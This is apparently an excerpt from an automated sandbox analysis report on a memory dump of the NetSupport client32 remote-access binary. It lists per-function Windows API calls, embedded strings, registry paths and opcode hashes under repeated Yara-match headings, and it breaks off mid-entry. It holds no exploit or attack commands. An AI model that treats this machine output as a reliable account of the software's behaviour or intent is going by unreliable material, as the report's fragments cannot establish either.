                                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&')(.-_{}~., xrefs: 11034125
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageSend$_strncmp
                                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&')(.-_{}~.
                                                                              • API String ID: 3653864897-2723064302
                                                                              APIs
                                                                              • RegOpenKeyExA.ADVAPI32(-80000002,SOFTWARE\Productive Computer Insight\Client32\AutoReconnect,00000000,00020019,00000000,?,?), ref: 1105A410
                                                                              • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,00000000,?,?,?,?,?,?), ref: 1105A46F
                                                                              • RegEnumValueA.ADVAPI32(00000000,00000001,?,?,00000000,?,?,?,?,?), ref: 1105A4E1
                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?), ref: 1105A4EE
                                                                              Strings
                                                                              • SOFTWARE\Productive Computer Insight\Client32\AutoReconnect, xrefs: 1105A3C9, 1105A404
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnumValue$CloseOpen
                                                                              • String ID: SOFTWARE\Productive Computer Insight\Client32\AutoReconnect
                                                                              • API String ID: 3785232357-4133889954
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID: %s: $CLIENT32
                                                                              • API String ID: 4139908857-407627211
                                                                              APIs
                                                                              • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 110773FB
                                                                                • Part of subcall function 11076740: DeferWindowPos.USER32(8B000EB5,00000000,BEE85BC0,33CD335E,?,00000000,33CD335E,11077496), ref: 11076783
                                                                              • EqualRect.USER32(?,?), ref: 1107740C
                                                                              • SetWindowPos.USER32(00000000,00000000,?,33CD335E,BEE85BC0,8B000EB5,00000014,?,?,?,?,?,110775EA,00000000,?), ref: 11077466
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077442
                                                                              • m_hWnd, xrefs: 11077447
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$DeferEqualPointsRect
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 2754115966-2830328467
                                                                              • Opcode ID: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                              • Instruction ID: 7762f9a6a2ed7d341f2943c2e7d232384b1531e6a197bbc7c1a3da1ffe608ad4
                                                                              • Opcode Fuzzy Hash: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                              • Instruction Fuzzy Hash: 74414B74A006099FDB14CF98C885EAABBF5FF48704F108569EA55AB344DB70A800CFA4
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?,AB86ACF8,?,?), ref: 11110564
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1111059E
                                                                              • SetEvent.KERNEL32(?), ref: 111105C9
                                                                              • LeaveCriticalSection.KERNEL32(00000000,00000000), ref: 11110604
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterEventLeaveXinvalid_argumentstd::_
                                                                              • String ID: list<T> too long
                                                                              • API String ID: 930337060-4027344264
                                                                              • Opcode ID: 0c55eadfd423d2968db6c31403b43634406423df5f7b4fd19a2904cad33ae44a
                                                                              • Instruction ID: 7bfaceea9a20e34aca0a829f3d9254b0af8797b3eeddb6bd678ff8280e03d006
                                                                              • Opcode Fuzzy Hash: 0c55eadfd423d2968db6c31403b43634406423df5f7b4fd19a2904cad33ae44a
                                                                              • Instruction Fuzzy Hash: C6314175A047059FD714CF64C984B56FBF9FB49314F10862EE8569BA44DB30F844CB51
                                                                              APIs
                                                                                • Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
                                                                                • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                              • GetSysColor.USER32(0000000F), ref: 111461A9
                                                                              • LoadBitmapA.USER32(00000000,00000000), ref: 111461BF
                                                                              • SendDlgItemMessageA.USER32(00000000,00003A97,00000172,00000000,00000000), ref: 111461FB
                                                                              Strings
                                                                              • ..\ctl32\util.cpp, xrefs: 111461D9
                                                                              • hGrip || !"Unable to load sizing grip bitmap", xrefs: 111461DE
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad$AddressBitmapColorDefaultFreeItemLangMessageProcSendSystemVersion_memset
                                                                              • String ID: ..\ctl32\util.cpp$hGrip || !"Unable to load sizing grip bitmap"
                                                                              • API String ID: 1044520585-3315463184
                                                                              • Opcode ID: 3a3d426a067b35c1d53599d825918b385af0754758e6c14c983fadd2fd90832f
                                                                              • Instruction ID: 8e565c128ad7df1c8f5e5c04fb88379ac646e9871c4513a0e4d424585abd715b
                                                                              • Opcode Fuzzy Hash: 3a3d426a067b35c1d53599d825918b385af0754758e6c14c983fadd2fd90832f
                                                                              • Instruction Fuzzy Hash: 0DF0BB79A4032577E61456F19D05FEBBA5C9B44F5DF004430FE19A7A82DE78D900C3E5
                                                                              APIs
                                                                              • SendMessageA.USER32(?,0000060C,00000002,00000000), ref: 1100422E
                                                                              • Sleep.KERNEL32(00000064), ref: 11004236
                                                                              • SendMessageA.USER32(?,0000060C,00000003,00000000), ref: 11004249
                                                                              Strings
                                                                              • m_pToolbar, xrefs: 1100425F
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\floatbar.h, xrefs: 1100425A
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageSend$Sleep
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\floatbar.h$m_pToolbar
                                                                              • API String ID: 2158920685-281161189
                                                                              • Opcode ID: a0821aae14efe8214b6c614132f1d640bedf4309a2c18a52162f058517ab24af
                                                                              • Instruction ID: e130d243a18c05c63e38ab9a554661a07bf0098fc6b996864d1fadb4c15248a9
                                                                              • Opcode Fuzzy Hash: a0821aae14efe8214b6c614132f1d640bedf4309a2c18a52162f058517ab24af
                                                                              • Instruction Fuzzy Hash: B4F0A435B80710AFE228EBA0DC45F47B3E6BBC8704F014214F6119B691D770A901CB44
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000001,11107408,?,?,00000000,?,00000104,?,1110809F), ref: 110F62F1
                                                                              • InterlockedExchange.KERNEL32(00000034,00000000), ref: 110F62FD
                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,?,00000104,?,1110809F), ref: 110F6308
                                                                              • InterlockedIncrement.KERNEL32(111F15FC), ref: 110F6335
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked$CloseExchangeHandleIncrementObjectSingleWait
                                                                              • String ID: s%d client died, u=%s
                                                                              • API String ID: 174804551-366056384
                                                                              • Opcode ID: c192f3d5bca484a890637941cdb3a7630fb987d5b52ec21a0ba5dd43187fcfb3
                                                                              • Instruction ID: 551c94e3cc5d53289c1f75ee3767d4d5f8739e99a0362a2e2ac3a71050f0140c
                                                                              • Opcode Fuzzy Hash: c192f3d5bca484a890637941cdb3a7630fb987d5b52ec21a0ba5dd43187fcfb3
                                                                              • Instruction Fuzzy Hash: 7EF0B475600216ABF7208AB4EE89FD7B7ECEF06708F010869F852D3A04D730E444CB21
                                                                              APIs
                                                                              • IsWindow.USER32(?), ref: 11034378
                                                                              • GetClassNameA.USER32(?,?,00000400), ref: 110343A6
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ClassErrorExitLastMessageNameProcessWindowwsprintf
                                                                              • String ID: CltAutoLogon.cpp$Edit$IsWindow(hWin)
                                                                              • API String ID: 2713866921-406224758
                                                                              • Opcode ID: 7905da4c080bb9fbcb2ea404f06bf2458b3badafe63713af4a017f97f9c02a33
                                                                              • Instruction ID: de5463733f4b21b7b592fd3ca8503f00e7fd8ffd50b0e49cc7191f6a28a46f2f
                                                                              • Opcode Fuzzy Hash: 7905da4c080bb9fbcb2ea404f06bf2458b3badafe63713af4a017f97f9c02a33
                                                                              • Instruction Fuzzy Hash: 12F0B4B5A4122D6BDB00DF649D01FEEF76C9F45209F0000A8EB15AB181EB746A05CBD9
                                                                              APIs
                                                                              • IsWindow.USER32(?), ref: 11034278
                                                                              • GetClassNameA.USER32(?,?,00000400), ref: 110342A6
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ClassErrorExitLastMessageNameProcessWindowwsprintf
                                                                              • String ID: CltAutoLogon.cpp$ComboBox$IsWindow(hWin)
                                                                              • API String ID: 2713866921-163732079
                                                                              • Opcode ID: 14a0087bc9e0b4944a4ea983ce77c4a7d22c973e095c8e634d6da1f2309b0550
                                                                              • Instruction ID: e653eece35be72a1d9193e49b8cd4dff3bda1b57b45a8763bea0034b8aaf2909
                                                                              • Opcode Fuzzy Hash: 14a0087bc9e0b4944a4ea983ce77c4a7d22c973e095c8e634d6da1f2309b0550
                                                                              • Instruction Fuzzy Hash: 9DF0B4B5A0122D6BDB00DF659D01FEEF7ACDF45219F0000A4EB15AA181EB346A15CBD9
                                                                              APIs
                                                                                • Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
                                                                                • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                              • LoadLibraryA.KERNEL32(gdi32.dll,?,75BFCF90,?,11003D52,00000000,00000008), ref: 11146155
                                                                              • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 11146167
                                                                              • FreeLibrary.KERNEL32(00000000,?,11003D52,00000000,00000008), ref: 1114617E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeLoadProc$DefaultLangSystemVersion_memset
                                                                              • String ID: SetLayout$gdi32.dll
                                                                              • API String ID: 796689547-836973393
                                                                              • Opcode ID: e2a02c7931241414dd0e38b0e94cf2378f17ecdb7d1e00b178c9e364d1f615da
                                                                              • Instruction ID: d41aa01a6e476ec3efb0e30ba4a4f3b24d6e29c0e630937b51d8ced853034778
                                                                              • Opcode Fuzzy Hash: e2a02c7931241414dd0e38b0e94cf2378f17ecdb7d1e00b178c9e364d1f615da
                                                                              • Instruction Fuzzy Hash: B9E0E536300129A7A7041BA6AD449AEBB6CDFC4D6E7110032FD28C3E00DF30D80286B1
                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 110ED0D9
                                                                              • SendMessageA.USER32(00000000,0000045B,11020C43,00000000), ref: 110ED10D
                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04000000), ref: 110ED11C
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$Send$ErrorExitLastProcessWindowwsprintf
                                                                              • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
                                                                              • API String ID: 2446111109-1196874063
                                                                              • Opcode ID: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                              • Instruction ID: de22b858d700e942c4608c09a96d83abbd875fbcce216c0436bbd94e05821714
                                                                              • Opcode Fuzzy Hash: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                              • Instruction Fuzzy Hash: 75E0D82978027837D52176926C0AFDF7B5CCB85A55F058021FB15BB0C1D560730146ED
                                                                              APIs
                                                                              • EndPagePrinter.WINSPOOL.DRV(00000000), ref: 11066312
                                                                              • EndDocPrinter.WINSPOOL.DRV(00000000), ref: 11066318
                                                                              • ClosePrinter.WINSPOOL.DRV(00000000,00000000), ref: 1106631E
                                                                              • CloseHandle.KERNEL32(00000000), ref: 11066326
                                                                              • Sleep.KERNEL32(000001F4), ref: 1106635A
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Printer.$Close$HandlePageSleep
                                                                              • String ID:
                                                                              • API String ID: 2391129857-0
                                                                              • Opcode ID: 837e2ad71b4aedaef123a839c0a4d46cfa0a08f569e05cf7b8d3d9f7176c7a1a
                                                                              • Instruction ID: 54f5cd880c03052bf648385b62e688d91943f5081a86e9c826f712f80982fdab
                                                                              • Opcode Fuzzy Hash: 837e2ad71b4aedaef123a839c0a4d46cfa0a08f569e05cf7b8d3d9f7176c7a1a
                                                                              • Instruction Fuzzy Hash: 03417E71E00616EFEB00CF64CD80B9EBBF9BF48359F1081A9D959AB281D770AA41CF50
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • CoInitialize.OLE32(00000000), ref: 1103615A
                                                                              • std::exception::exception.LIBCMT ref: 11036181
                                                                              • __CxxThrowException@8.LIBCMT ref: 11036196
                                                                              • std::exception::exception.LIBCMT ref: 110361A5
                                                                              • __CxxThrowException@8.LIBCMT ref: 110361BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Exception@8Throwstd::exception::exception$Initialize_malloc_memsetwsprintf
                                                                              • String ID:
                                                                              • API String ID: 1786275401-0
                                                                              • Opcode ID: abf63ed10b9a33d35738ef3545b146c3bbc204ca284e0326731a08126ed97f7e
                                                                              • Instruction ID: 91a3b5653d7650477d6c86e486cf4b90a783982459a57e5f4808bea1ecc0b8d8
                                                                              • Opcode Fuzzy Hash: abf63ed10b9a33d35738ef3545b146c3bbc204ca284e0326731a08126ed97f7e
                                                                              • Instruction Fuzzy Hash: 8B41F7B5D10709AFC715CFAAD98099AFBF8FF18704F50892EE55AA3640E735A604CB90
                                                                              APIs
                                                                                • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CAB
                                                                                • Part of subcall function 11034C90: SetForegroundWindow.USER32(?), ref: 11034CB5
                                                                                • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CDF
                                                                                • Part of subcall function 11034C90: Sleep.KERNEL32(00000032), ref: 11034CE9
                                                                              • Sleep.KERNEL32(00000032,LegalNoticeText,?,?,LegalNoticeCaption,?,?,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F191
                                                                              • GetLastError.KERNEL32(00000000,Global\Client32Provider,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F1DF
                                                                              • Sleep.KERNEL32(00000032,?,?,0000004A,00000000,?), ref: 1104F33D
                                                                              • Sleep.KERNEL32(00000032), ref: 1104F383
                                                                              Strings
                                                                              • error opening ipc lap %d to logon, e=%d, %s, xrefs: 1104F1E7
                                                                              • Global\Client32Provider, xrefs: 1104F1BB
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep$EnumWindows$ErrorForegroundLastWindow
                                                                              • String ID: Global\Client32Provider$error opening ipc lap %d to logon, e=%d, %s
                                                                              • API String ID: 3682529815-1899068400
                                                                              • Opcode ID: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                              • Instruction ID: 6aab5bd338832a8b6cc9a825996d00e4c24ed17e7d33d91b3ba03cdb4d861036
                                                                              • Opcode Fuzzy Hash: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                              • Instruction Fuzzy Hash: BC212638D4425ACED715DBA4CD98BECB760EB9630AF2001FDD85A97590EF302A45CB12
                                                                              APIs
                                                                                • Part of subcall function 110400B0: DeleteObject.GDI32(?), ref: 1104019B
                                                                              • CreateRectRgnIndirect.GDI32(?), ref: 11040218
                                                                              • CombineRgn.GDI32(?,?,00000000,00000002), ref: 1104022C
                                                                              • DeleteObject.GDI32(00000000), ref: 11040233
                                                                              • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 11040256
                                                                              • CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 1104026D
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CombineCreateDeleteObjectRect$Indirect
                                                                              • String ID:
                                                                              • API String ID: 3044651595-0
                                                                              • Opcode ID: bdd4bcdb3aa3dcabfe6cf7331a892a45fd264ed50371146b7216a965a4c33285
                                                                              • Instruction ID: 40609504ee2ce5e6893e22a8e9e4794f5f90a477b0a86d2cb080c2a65735e6f6
                                                                              • Opcode Fuzzy Hash: bdd4bcdb3aa3dcabfe6cf7331a892a45fd264ed50371146b7216a965a4c33285
                                                                              • Instruction Fuzzy Hash: 25116D71A40705EFE764CE60CA88BD6F7ECFB14719F10417AE529A29C4C7B4B881CB50
                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
                                                                              • DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A298
                                                                              • GetLastError.KERNEL32 ref: 1100A2A0
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
                                                                              • CloseHandle.KERNEL32(00000000), ref: 1100A2BB
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseControlCreateDeviceErrorEventHandleLastObjectSingleWait
                                                                              • String ID:
                                                                              • API String ID: 2062450601-0
                                                                              • Opcode ID: b7a7dcf123d1102af8070ae9ded992f2e722cbafb170e9e3478bdc9f249b2094
                                                                              • Instruction ID: bc93eed9d268af17b12dc0c75b84aef517d95988fbcc1729b49ee65d4685203d
                                                                              • Opcode Fuzzy Hash: b7a7dcf123d1102af8070ae9ded992f2e722cbafb170e9e3478bdc9f249b2094
                                                                              • Instruction Fuzzy Hash: F601F731A40629B7F7159AA8CC45F9DB768AB44775F204320F934A76C0C770A94187D4
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 1103456F
                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 11034578
                                                                              • GetDlgCtrlID.USER32(?), ref: 1103457F
                                                                              • GetClassNameA.USER32(?,?,00000400), ref: 11034592
                                                                              • GetWindowTextA.USER32(?,?,00000400), ref: 110345A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ClassCtrlLongNameRectText
                                                                              • String ID:
                                                                              • API String ID: 2484906136-0
                                                                              • Opcode ID: ce159bbfeb3044cedd36f1e5c8e865b9ac25697cea3e73b3724e752e1ec9f2c1
                                                                              • Instruction ID: c25dcb202ae9d01d0aecf4f64a68191ce3fcfabe0d99871be661b9556b24c4fa
                                                                              • Opcode Fuzzy Hash: ce159bbfeb3044cedd36f1e5c8e865b9ac25697cea3e73b3724e752e1ec9f2c1
                                                                              • Instruction Fuzzy Hash: BAF0AF7244112CABC714DBA4CE48EEEB36CEF09308F004164F62296584DF782A46CBE9
                                                                              APIs
                                                                              • __getptd.LIBCMT ref: 11171312
                                                                                • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                              • __getptd.LIBCMT ref: 11171329
                                                                              • __amsg_exit.LIBCMT ref: 11171337
                                                                              • __lock.LIBCMT ref: 11171347
                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 1117135B
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                              • String ID:
                                                                              • API String ID: 938513278-0
                                                                              • Opcode ID: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                              • Instruction ID: 9cb08520484339131e966c5afe67267813abc49f95b778b0e1eea255b6adbda5
                                                                              • Opcode Fuzzy Hash: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                              • Instruction Fuzzy Hash: 67F0243AD04322DAE7119BB88801B5CF7A16F0073CF110249D814A77C0CFA47810CB5B
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • std::exception::exception.LIBCMT ref: 110BE1F9
                                                                              • __CxxThrowException@8.LIBCMT ref: 110BE20E
                                                                              Strings
                                                                              • HasListener(), xrefs: 110BE19D
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\WBObject.h, xrefs: 110BE198
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                              • String ID: HasListener()$e:\nsmsrc\nsm\1210\1210f\ctl32\WBObject.h
                                                                              • API String ID: 1338273076-3267820813
                                                                              • Opcode ID: 3a5f3d62879c966fc82f418f694905d75f14910616183289d6c69cf165eafd22
                                                                              • Instruction ID: 72efe913c15dd2a825e40b83131ec7a5b7bb91afe0206afba866435cf9ee8433
                                                                              • Opcode Fuzzy Hash: 3a5f3d62879c966fc82f418f694905d75f14910616183289d6c69cf165eafd22
                                                                              • Instruction Fuzzy Hash: 88716179E00259EFCB05DFA8D880BEEFBF8EF58314F104559E415A7280DB75AA44CBA1
                                                                              APIs
                                                                                • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                • Part of subcall function 11145410: GetSystemMetrics.USER32(0000005E), ref: 1114542A
                                                                                • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC387
                                                                                • Part of subcall function 110CC360: GetWindowRect.USER32(00000000), ref: 110CC38A
                                                                                • Part of subcall function 110CC360: MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 110CC39C
                                                                                • Part of subcall function 110CC360: MapDialogRect.USER32(00000000,?), ref: 110CC3C8
                                                                                • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC401
                                                                                • Part of subcall function 110CC360: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000010), ref: 110CC41C
                                                                                • Part of subcall function 110183B0: GetSystemMetrics.USER32(0000005E), ref: 110183BF
                                                                                • Part of subcall function 110183B0: GetSystemMetrics.USER32(00002003), ref: 110183DF
                                                                              • std::exception::exception.LIBCMT ref: 11053483
                                                                              • __CxxThrowException@8.LIBCMT ref: 11053498
                                                                              Strings
                                                                              Memory Dump Source
